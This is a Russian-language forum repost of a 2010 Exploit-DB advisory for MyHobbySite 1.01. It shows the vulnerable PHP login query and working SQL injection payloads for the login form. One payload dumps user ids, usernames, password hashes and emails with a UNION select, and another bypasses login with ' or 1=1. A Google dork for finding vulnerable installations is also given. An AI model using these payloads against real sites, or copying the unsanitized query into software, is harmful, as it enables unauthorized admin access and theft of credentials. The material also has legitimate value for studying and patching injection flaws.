- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14977
- Проверка EDB
-
- Пройдено
- Автор
- YUGJ VN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2010-09-12
MyHobbySite 1.01 - SQL Injection / Authentication Bypass
Код:
#########################################################################################
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
# Date: 12-09-2010
# Author: YuGj VN
# Email: [email protected]
# Software Link: http://www.myhobbysite.net/index.php?page=15
# Version: v1.01
#########################################################################################
Bug Code:
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
// Get user info from the dataabse
$_REQUEST['username'] = trim($_REQUEST['username']);
$_REQUEST['password'] = trim($_REQUEST['password']);
$usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
$usersettings = mysql_fetch_array($usersettings);
if ($usersettings) {
$_SESSION['logged_in'] = TRUE;
$_SESSION['userid'] = $usersettings['id'];
$_SESSION['user'] = $usersettings['username'];
$_SESSION['pass'] = $usersettings['password'];
$_SESSION['email'] = $usersettings['email'];
$_SESSION['permissions'] = $usersettings['permissions'];
UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
} else {
$failed_login = TRUE;
}
}
#########################################################################################
Exploit:
link exploit: http://domain.com/admin/
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# or
# Enter in username field: ' or 1=1-- -
# Enter in password field: ' or 1=1-- -
#
#
# We can exploit only when magic_quote_gpc = Off
# Google dork: Powered by MyHobbySite 1.01
#
#
#########################################################################################
- Источник
- www.exploit-db.com